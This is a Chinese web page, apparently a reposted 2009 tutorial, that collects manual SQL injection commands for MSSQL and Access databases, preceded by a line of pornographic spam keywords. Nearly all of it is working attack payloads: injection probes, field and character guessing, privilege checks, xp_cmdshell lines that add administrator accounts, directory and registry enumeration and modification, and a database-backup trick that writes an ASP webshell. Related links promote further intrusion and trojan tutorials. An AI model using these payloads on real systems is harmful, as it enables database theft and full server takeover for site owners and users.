欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

注入命令 手工注入命令大全

  發(fā)布時(shí)間:2009-09-30 00:27:16   作者:佚名   我要評(píng)論
手工注入命令收集,大家可以學(xué)習(xí)下,早點(diǎn)擺脫工具,早有所成。
1.判斷是否有注入;and 1=1 ;and 1=22.初步判斷是否是mssql ;and user>03.注入?yún)?shù)是字符'and [查詢(xún)條件] and ''='4.搜索時(shí)沒(méi)過(guò)濾參數(shù)的'and [查詢(xún)條件] and '%25'='5.判斷數(shù)據(jù)庫(kù)系統(tǒng)
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access6.猜數(shù)據(jù)庫(kù) ;and (select Count(*) from [數(shù)據(jù)庫(kù)名])>07.猜字段 ;and (select Count(字段名) from 數(shù)據(jù)庫(kù)名)>08.猜字段中記錄長(zhǎng)度 ;and (select top 1 len(字段名) from 數(shù)據(jù)庫(kù)名)>09.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 數(shù)據(jù)庫(kù)名)>0(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 數(shù)據(jù)庫(kù)名)>010.測(cè)試權(quán)限結(jié)構(gòu)(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--11.添加mssql和系統(tǒng)的帳戶(hù)
;exec master.dbo.sp_addlogin username;--;exec master.dbo.sp_password null,username,password;--;exec master.dbo.sp_addsrvrolemember sysadmin username;--;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--;exec master.dbo.xp_cmdshell 'net user username password /add';--;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--12.(1)遍歷目錄;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)(2)遍歷目錄
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 獲得當(dāng)前所有驅(qū)動(dòng)器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 獲得所有子目錄的目錄樹(shù)構(gòu)
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的內(nèi)容13.mssql中的存儲(chǔ)過(guò)程xp_regenumvalues 注冊(cè)表根鍵, 子鍵
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多個(gè)記錄集方式返回所有鍵值xp_regread 根鍵,子鍵,鍵值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定鍵的值xp_regwrite 根鍵,子鍵, 值名, 值類(lèi)型, 值
值類(lèi)型有2種REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 寫(xiě)入注冊(cè)表xp_regdeletevalue 根鍵,子鍵,值名exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 刪除某個(gè)值xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 刪除鍵,包括該鍵下所有值14.mssql的backup創(chuàng)建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';15.mssql內(nèi)置函數(shù)
;and (select @@version)>0 獲得Windows的版本號(hào)
;and user_name()='dbo' 判斷當(dāng)前系統(tǒng)的連接用戶(hù)是不是sa
;and (select user_name())>0 爆當(dāng)前系統(tǒng)的連接用戶(hù)
;and (select db_name())>0 得到當(dāng)前連接的數(shù)據(jù)庫(kù)16.簡(jiǎn)潔的webshelluse modelcreate table cmd(str image);insert into cmd(str) values ('');backup database model to disk='g:\wwwtest\l.asp';

相關(guān)文章

  • 最經(jīng)典的黑客入門(mén)教程(安全必備技能)

    無(wú)論那類(lèi)黑客,他們最初的學(xué)習(xí)內(nèi)容都將是本部分所涉及的內(nèi)容,而且掌握的基本技能也都是一樣的。即便日后他們各自走上了不同的道路,但是所做的事情也差不多,只不過(guò)出發(fā)點(diǎn)
    2013-04-16
  • 局域網(wǎng)入侵完全版

    首先申明:   1.入侵的范圍只包括局域網(wǎng),如果在學(xué)校上,可以入侵整個(gè)校園網(wǎng);   2.能入侵的只是存在弱口令(用戶(hù)名為administrator等,密碼為空),并且開(kāi)了139端口
    2009-06-09
  • 黑客域名劫持攻擊的基本步驟

    近期發(fā)現(xiàn)adobe.com,internet.com,nike.com,等等著名站點(diǎn)都分分遭受到攻擊,但攻擊者所使用的技術(shù)并不是以往所使用的入侵WEB服務(wù)器,更改主頁(yè)的慣用手法,攻擊者使用的是一
    2008-10-08
  • 抓取管理員hash值(哈希)的另類(lèi)方法

    哈希算法將任意長(zhǎng)度的二進(jìn)制值映射為固定長(zhǎng)度的較小二進(jìn)制值,這個(gè)小的二進(jìn)制值稱(chēng)為哈希值。哈希值是一段數(shù)據(jù)唯一且極其緊湊的數(shù)值表示形式。如果散列一段明文而且哪怕只更
    2012-05-11
  • 整人用的一個(gè)電腦重啟病毒

    這篇文章主要介紹了整人用的一個(gè)電腦重啟病毒,本文用bat文件偽造如QQ圖標(biāo)等常用軟件,導(dǎo)致點(diǎn)擊就會(huì)重啟的惡作劇腳本,需要的朋友可以參考下
    2014-10-10
  • 教你成為ASP木馬高手

    1.名稱(chēng):如何制作圖片ASP木馬 (可顯示圖片) 建一個(gè)asp文件,內(nèi)容為<!--#i nclude file="ating.jpg"--> 找一個(gè)正常圖片ating.jpg,插入一句話(huà)木
    2008-10-08
  • 黑客專(zhuān)家教你設(shè)計(jì)不易破解的密碼以及注意事項(xiàng)

      美國(guó)一家密碼管理應(yīng)用提供商SplashData 公司近期總結(jié)出2012年度最差的25個(gè)密碼,美國(guó)《紐約時(shí)報(bào)》作家尼克爾·佩爾榮斯近日撰文指出,密碼要想不被黑客猜中,有幾點(diǎn)非
    2012-11-13
  • 教你phpMyAdmin 后臺(tái)拿webshell

    1.如何拿到登陸密碼,自己想辦法。 2.訪(fǎng)問(wèn) : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑. 3.選擇一個(gè)Database.運(yùn)行以下語(yǔ)句. ----start cod
    2008-10-08
  • 黑客攻擊數(shù)據(jù)庫(kù)的六大手段

    普通的黑客從進(jìn)入到退出一次數(shù)據(jù)攻擊只需用不到10秒鐘時(shí)間就可完成,這個(gè)時(shí)間對(duì)于數(shù)據(jù)庫(kù)管理員來(lái)說(shuō)即使注意到入侵者都幾乎不夠。因此,在數(shù)據(jù)被損害很長(zhǎng)時(shí)間之前,許多數(shù)據(jù)
    2008-10-08
  • 盤(pán)點(diǎn)2016上半年十大APT神秘黑客組織

    眾所周知,近幾年來(lái)。世界各大組織都曾遭到APT的神秘攻擊,其無(wú)孔不入,幾乎所有的行業(yè)都受到了威脅,下面小編就為大家盤(pán)點(diǎn)2016上半年十大APT神秘黑客組織
    2016-08-23

最新評(píng)論